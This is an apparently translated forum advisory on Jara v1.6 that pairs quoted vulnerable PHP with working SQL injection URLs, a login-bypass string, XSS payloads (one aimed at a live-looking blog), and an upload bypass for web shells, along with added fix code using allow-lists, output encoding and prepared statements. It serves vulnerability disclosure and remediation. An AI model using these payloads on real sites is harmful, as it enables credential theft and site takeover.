Jara v1.6 - 1st March 2010
http://jara.xantiz.com/download.html

category.php
PHP:
@$categoryid = $_REQUEST["id"];
$category = jara_get_category($categoryid);
jara_page_start("Category: ".$category["title"]);
$query = "select * from jara_posts where categoryid = '$categoryid'";

SQL, mq=off:
http://localhost/jarav16/category.php?id=-1'+union+select+1,version(),3+--+

----------------------
view.php
PHP:
session_start();
$id = $_REQUEST["id"];
if(isset($_POST["name"])) {
    $name = $_POST["name"];
    $website = $_POST["website"];
    $comment = $_POST["comment"];
    if(substr($website, 0, 4) != "http") {
        $website = "javascript:;";
    }
    $name = htmlspecialchars($name);
    $comment = strip_tags($comment);
    if(!get_magic_quotes_gpc()) {
        $name = addslashes($name);
        $website = addslashes($website);
        $comment = addslashes($comment);
    }
    if(strlen($name) > 64) {
        $name = substr($name, 0, 60) . "...";
    }
    if(!empty($name) && !empty($comment) && $_POST["security"] == $_SESSION["result"]) {
        @jara_db_query("insert into jara_comments values('0', '$id', '$name', '$website', '$comment', '".time()."')");

$id is not filtered; with mq=off this gives SQL injection + active XSS.
Because of the captcha it is more convenient to use Firefox + Tamper Data.
http://localhost/jarav16/view.php?id=1
Fill in Your Name:, Your Comment:, Security Question: and in Tamper Data edit id:
id=1','Guest','','Hi!<script>alert(121212);</script>',1270547738) -- 1
At http://localhost/jarav16/view.php?id=1 we get an alert.

----------------------
page.php
PHP:
$id = $_REQUEST["id"];
$result = jara_db_query("select * from jara_pages where id = '$id' limit 1");

SQL, mq=off:
http://localhost/jarav16/page.php?id=1'+union+select+1,username,unhex(hex(password)),4+from+jara_users+--+
The hash is stored as SHA1.

----------------------
In the admin panel:
admin/upload.php
PHP:
if(is_writable("./../uploads/")) {
    if($_FILES["userfile"]["size"] > 0) {
        $ext = strtolower(end(explode(".", basename($_FILES["userfile"]["name"]))));
        if($ext == "php" || $ext == "pl" || $ext == "exe" || $ext == "sh") {
            echo "<p>You're trying to upload an extension that's not allowed. Please upload it inside a container such as a compressed archive.</p>";
        } else {
            if($_FILES["userfile"]["error"] == 0) {
                $filename = $_SESSION["jara_admin"] . "-" . strtolower(preg_replace("/[^a-zA-Z0-9]/", "-", basename($_FILES["userfile"]["name"]))) . "-" . time() . "." . strtolower(end(explode(".", basename($_FILES["userfile"]["name"]))));
                if(move_uploaded_file($_FILES["userfile"]["tmp_name"], "./../uploads/$filename")) {
                    echo "<p><strong>Your file was uploaded to <a href=\"../uploads/$filename\">$filename</a> in the uploads directory.</strong></p>";

Shell: files with the .php3 and .phtml extensions are accepted by the upload.
----------------------
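The upload check quoted above is a deny-list on four extensions, which is why other server-side extensions get through. The following is an added example of the allow-list approach, not Jara's code: the names jara_safe_upload_name(), jara_upload_mime_ok() and the JARA_UPLOAD_ALLOWED list are assumptions, and it assumes PHP 7.1+ with the fileinfo extension. The stored name is built from scratch, so nothing from the client's filename except the allowed extension ever reaches the uploads directory.

```php
<?php
// Added example (not Jara's code): allow-list replacement for the extension
// deny-list in admin/upload.php. Function and constant names are hypothetical.

// Only the types the site actually needs to serve. Anything else (.php3,
// .phtml, .phar, .htaccess, ...) is refused instead of enumerated.
const JARA_UPLOAD_ALLOWED = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'zip'];

/**
 * Returns a safe storage name for an uploaded file, or null if refused.
 * $original is the client-supplied name, $user the admin session name.
 */
function jara_safe_upload_name(string $original, string $user): ?string
{
    $base = basename($original);
    $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    if ($ext === '' || !in_array($ext, JARA_UPLOAD_ALLOWED, true)) {
        return null;
    }
    // The stored name contains no part of the original name, so a name like
    // "x.php.jpg" cannot carry its inner extension into the uploads directory.
    $userPart = preg_replace('/[^a-zA-Z0-9]/', '-', $user);
    return $userPart . '-' . bin2hex(random_bytes(8)) . '.' . $ext;
}

/**
 * Second check, independent of the name: the file content must match the
 * MIME type expected for the allowed extension.
 */
function jara_upload_mime_ok(string $tmpPath, string $ext): bool
{
    $allowedMime = [
        'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'png' => 'image/png',
        'gif' => 'image/gif', 'pdf' => 'application/pdf', 'zip' => 'application/zip',
    ];
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime = $finfo->file($tmpPath);
    return isset($allowedMime[$ext]) && $mime === $allowedMime[$ext];
}

// Request handling in the shape of upload.php (assumed layout: ../uploads/).
if (isset($_FILES['userfile']) && $_FILES['userfile']['error'] === UPLOAD_ERR_OK) {
    $name = jara_safe_upload_name($_FILES['userfile']['name'], $_SESSION['jara_admin'] ?? 'admin');
    $ext  = $name === null ? '' : strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if ($name === null || !jara_upload_mime_ok($_FILES['userfile']['tmp_name'], $ext)) {
        echo '<p>That file type is not allowed.</p>';
    } elseif (move_uploaded_file($_FILES['userfile']['tmp_name'], './../uploads/' . $name)) {
        echo '<p>Uploaded as ' . htmlspecialchars($name, ENT_QUOTES, 'UTF-8') . '</p>';
    }
}

// Offline check from the CLI: constructed names, no real uploads involved.
if (PHP_SAPI === 'cli') {
    var_dump(jara_safe_upload_name('report.PDF', 'admin'));
    var_dump(jara_safe_upload_name('shell.phtml', 'admin'));
    var_dump(jara_safe_upload_name('shell.php3', 'admin'));
    var_dump(jara_safe_upload_name('noext', 'admin'));
}
```

Run from the CLI, the first call returns a generated name and the other three return NULL. As a second layer, the uploads directory itself should have script execution disabled in the web server configuration, so that even a misclassified file is served as static content.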
Jara v1.6 - 1st March 2010
XSS
/search.php
PHP:
...
try {
    jara_page_start("Search results");
    $term = $_REQUEST["term"];
    if(!get_magic_quotes_gpc()) {
        $term = addslashes($term);
...
PHP:
...
echo "<p><strong>$num_rows</strong> results for <strong>".stripslashes($term)."</strong>.</p>";
...
HTML:
...
<form action="search.php" method="post">
    <p>
        Search term: <input type="text" name="term" id="term" /><input type="submit" value="Go" />
    </p>
</form>
...
Result: XSS in the term field.
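Both the stored comment in view.php (previous post) and the reflected search term here are echoed without HTML encoding; addslashes()/stripslashes() only deal with SQL quoting and do nothing for the browser. The following is an added example, not Jara's code, of encoding at output time: jara_esc(), jara_safe_href(), jara_render_comment() and jara_render_search_header() are hypothetical names, and the sample rows are constructed, not site data.

```php
<?php
// Added example (not Jara's code): encode on output rather than sanitise on
// input. All function names below are hypothetical.

// One encoder for HTML body and attribute context, used wherever text is echoed.
function jara_esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// The original substr($website, 0, 4) != "http" test accepts anything that
// merely starts with "http". Parse the URL and accept only http(s) with a host;
// otherwise drop the link (no "javascript:;" placeholder href at all).
function jara_safe_href(string $url): ?string
{
    $url = trim($url);
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    $host   = parse_url($url, PHP_URL_HOST);
    if (!in_array($scheme, ['http', 'https'], true) || empty($host)) {
        return null;
    }
    return $url;
}

// Render one stored comment row. The row holds the user's raw text; the insert
// should store it untouched through a prepared statement, not addslashes().
function jara_render_comment(array $row): string
{
    $name = jara_esc($row['name']);
    $href = jara_safe_href($row['website'] ?? '');
    $who  = $href === null
        ? $name
        : '<a href="' . jara_esc($href) . '" rel="nofollow">' . $name . '</a>';
    return '<div class="comment"><p><strong>' . $who . '</strong></p><p>'
        . nl2br(jara_esc($row['comment'])) . '</p></div>';
}

// search.php: the echoed term gets the same encoder.
function jara_render_search_header(int $numRows, string $term): string
{
    return '<p><strong>' . $numRows . '</strong> results for <strong>'
        . jara_esc($term) . '</strong>.</p>';
}

// Constructed sample rows (not real site data) for an offline run.
$rows = [
    ['name' => 'Guest', 'website' => 'http://example.com/', 'comment' => "Hi!\nNice post."],
    ['name' => 'Guest', 'website' => 'javascript:alert(1)', 'comment' => 'Hi!<script>alert(121212);</script>'],
];
foreach ($rows as $row) {
    echo jara_render_comment($row), "\n";
}
echo jara_render_search_header(0, '"><script>alert(document.cookie)</script><"'), "\n";
```

In the rendered output the second row's comment appears as literal text (`&lt;script&gt;...`) with no link, and the search header shows the quotes and angle brackets as entities rather than markup.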
SQL inj - a classic of the genre! Getting into the Jara v1.6 admin panel.
/login.php
PHP:
require_once("include/jara_fns.php");
if(isset($_POST["login_action"])) {
    try {
        session_start();
        $username = $_POST["username"];
        $password = $_POST["password"];
        if(!get_magic_quotes_gpc()) {
            $username = addslashes($username);
            $password = addslashes($password);
        }
        $result = jara_user_authenticate($_POST["username"], $_POST["password"]);
        if($result == false) {
            jara_page_start("Login failure");
            echo "<p>\n";
            echo "\tYou have entered an invalid username or password.<br />\n";
            echo "\tPlease go back and try again.\n";
            echo "</p>";
            jara_page_end();
            exit;
        } else {
            header("Location: index.php");
        }
    } catch(JaraDatabaseException $ex) {
        jara_page_start("Login failure");
...
The raw $_POST["username"] and $_POST["password"] are passed into jara_user_authenticate, so this construct does nothing:
PHP:
...
$username = $_POST["username"];
$password = $_POST["password"];
if(!get_magic_quotes_gpc()) {
    $username = addslashes($username);
    $password = addslashes($password);
}
...
/include/auth_fns.php
PHP:
...
function jara_user_authenticate($username, $password) {
    $query = "select * from jara_users where username = '$username' and password = SHA1('$password') limit 1";
    $result = jara_db_query($query);
    if($result->num_rows == 0) {
        return false;
    } else {
        $row = $result->fetch_assoc();
        $_SESSION["jara_admin"] = $username;
        $_SESSION["jara_permissions"] = array($row["permission_posts"], $row["permission_pages"], $row["permission_users"], $row["permission_upload"]);
        return true;
    }
}
...
Condition: mq=off
Result:
<input type="text" id="username" name="username" width="20" />
in the username field: ' or 1=1--[ ]
SQL inj Jara v1.6
/admin/delete_category.php
PHP:
...
try {
    $id = $_REQUEST["id"];
    if($id == 1) {
        throw new JaraGeneralException("You cannot the delete the Uncategorized category.");
    }
    $query = "delete from jara_categories where categoryid = '$id'";
    $result = jara_db_query($query);
...
/include/db_fns.php
PHP:
...
function jara_db_connect() {
    global $jconfig, $db_conn;
    if($db_conn == null) {
        @$conn = new mysqli($jconfig->mysql_host, $jconfig->mysql_username, $jconfig->mysql_password, $jconfig->mysql_db);
        if(mysqli_connect_errno()) {
            throw new JaraDatabaseException(1, mysqli_connect_errno(), mysqli_connect_error());
        }
        $db_conn = $conn;
        return $conn;
    } else {
        return $db_conn;
    }
}
function jara_db_query($query) {
    $conn = jara_db_connect();
    $result = $conn->query($query);
    if($conn->errno) {
        throw new JaraDatabaseException(2, $conn->errno, $conn->error, $query);
    }
    if(substr($query, 0, 6) == "select" || substr($query, 0, 4) == "show" || substr($query, 0, 7) == "explain") {
        return $result;
    } else {
        return $conn->affected_rows;
    }
}
Condition: mq=off
Result:
http://localhost/jarav/admin/delete_category.php?id=1[sql]
http://localhost/jarav/admin/delete_category.php?id=1' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(version(),floor(rand(0)*2)))--+
Other scripts are also vulnerable!
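Every query quoted in this thread goes through jara_db_query() with the request value already interpolated, which is why the same injection shows up in login.php (previous post), delete_category.php and the rest. The following is an added example, not Jara's code, of a parameterised companion to that function and of the two callers rewritten to use it: jara_db_query_params(), jara_delete_category() and jara_user_authenticate_safe() are hypothetical names, while jara_db_connect(), JaraDatabaseException and JaraGeneralException are the project's own as shown above. It assumes mysqli with mysqlnd (needed for get_result()).

```php
<?php
// Added example (not Jara's code): a bound-parameter companion to
// jara_db_query(). Wrapper and rewritten callers are hypothetical; it relies on
// the project's jara_db_connect() and exception classes quoted above.

/**
 * Run $sql with bound parameters. $types is mysqli's bind_param type string
 * ("i" int, "s" string, "d" double). Returns a mysqli_result for row-returning
 * statements, otherwise the affected-row count, mirroring jara_db_query().
 */
function jara_db_query_params(string $sql, string $types = '', array $params = [])
{
    $conn = jara_db_connect();
    $stmt = $conn->prepare($sql);
    if ($stmt === false) {
        throw new JaraDatabaseException(2, $conn->errno, $conn->error, $sql);
    }
    if ($types !== '') {
        $stmt->bind_param($types, ...$params);
    }
    if (!$stmt->execute()) {
        throw new JaraDatabaseException(2, $stmt->errno, $stmt->error, $sql);
    }
    $result   = $stmt->get_result();   // false for statements without a result set
    $affected = $stmt->affected_rows;
    $stmt->close();
    return $result !== false ? $result : $affected;
}

// admin/delete_category.php: the id is an integer, so anything that is not
// one is rejected before it gets near the database.
function jara_delete_category($rawId): int
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT);
    if ($id === false) {
        throw new JaraGeneralException("Invalid category id.");
    }
    if ($id === 1) {
        throw new JaraGeneralException("You cannot delete the Uncategorized category.");
    }
    return jara_db_query_params(
        "delete from jara_categories where categoryid = ?", "i", [$id]
    );
}

// include/auth_fns.php: same query shape as the original, but username and
// password are bound values, so a quote in either is just data, and the
// addslashes() copies in login.php become unnecessary.
function jara_user_authenticate_safe(string $username, string $password): bool
{
    $result = jara_db_query_params(
        "select * from jara_users where username = ? and password = SHA1(?) limit 1",
        "ss", [$username, $password]
    );
    $row = $result->fetch_assoc();
    if ($row === null) {
        return false;
    }
    $_SESSION["jara_admin"] = $username;
    $_SESSION["jara_permissions"] = array(
        $row["permission_posts"], $row["permission_pages"],
        $row["permission_users"], $row["permission_upload"]
    );
    return true;
}
```

The wrapper keeps jara_db_query()'s return convention so the other scripts in the thread can be moved over one at a time. The unsalted SHA1 column stays as it is here only to keep the query identical to the original; a separate change to password_hash()/password_verify() would be the next step.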
http://xantiz.co.cc/blog/view.php?id=8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C%22
If mq is on, this also works.